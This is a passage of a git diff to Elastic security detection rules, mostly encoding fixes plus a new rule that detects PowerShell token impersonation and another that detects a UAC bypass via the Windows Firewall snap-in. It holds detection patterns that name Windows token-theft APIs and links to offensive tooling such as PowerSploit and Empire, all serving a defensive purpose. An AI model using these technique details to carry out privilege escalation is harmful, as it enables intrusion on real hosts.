Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json index 8f7a2a1417c..e427d5e7963 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json index ef7e22cf936..733c935b549 100644 --- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json index 2f6d8ee7cdc..3eb2b0c9fdf 100644 --- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json index 4544da7d5f9..c0c1482b96b 100644 --- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json index 811ca8ac708..cc8ad0d9dda 100644 --- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json +++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json new file mode 100644 index 00000000000..2ce48024ceb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Token Impersonation Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Token Impersonation Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries can abuse PowerShell to perform token impersonation, which involves duplicating and impersonating another user's token to escalate privileges and bypass access controls. This rule identifies scripts containing PowerShell functions, structures, or Windows API functions related to token impersonation/theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine PowerShell process creation and script block logs to identify command line arguments or hardcoded information that can indicate which user was the target of the impersonation.\n- Investigate any abnormal behavior by the subject process (PowerShell), such as network connections, registry or file modifications, and any spawned child processes.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Regular users should not need to impersonate other users, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related Rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-TokenManipulation\" or\n \"ImpersonateNamedPipeClient\" or\n \"NtImpersonateThread\" or\n (\n \"STARTUPINFOEX\" and\n \"UpdateProcThreadAttribute\"\n ) or\n (\n \"AdjustTokenPrivileges\" and\n \"SeDebugPrivilege\"\n ) or\n (\n (\"DuplicateToken\" or\n \"DuplicateTokenEx\") and\n (\"SetThreadToken\" or\n \"ImpersonateLoggedOnUser\" or\n \"CreateProcessWithTokenW\" or\n \"CreatePRocessAsUserW\" or\n \"CreateProcessAsUserA\")\n ) \n ) and\n not (\n user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/decoder-it/psgetsystem", + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/Get-System.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 10 + }, + "id": "11dd9713-0ec6-4110-9707-32daae1ee68c_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json index 562916ddfeb..aaa8cbbaf2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json index 321a7caba07..d67f0594b1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json index a9f4619fef4..7228fc17d5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -88,7 +88,7 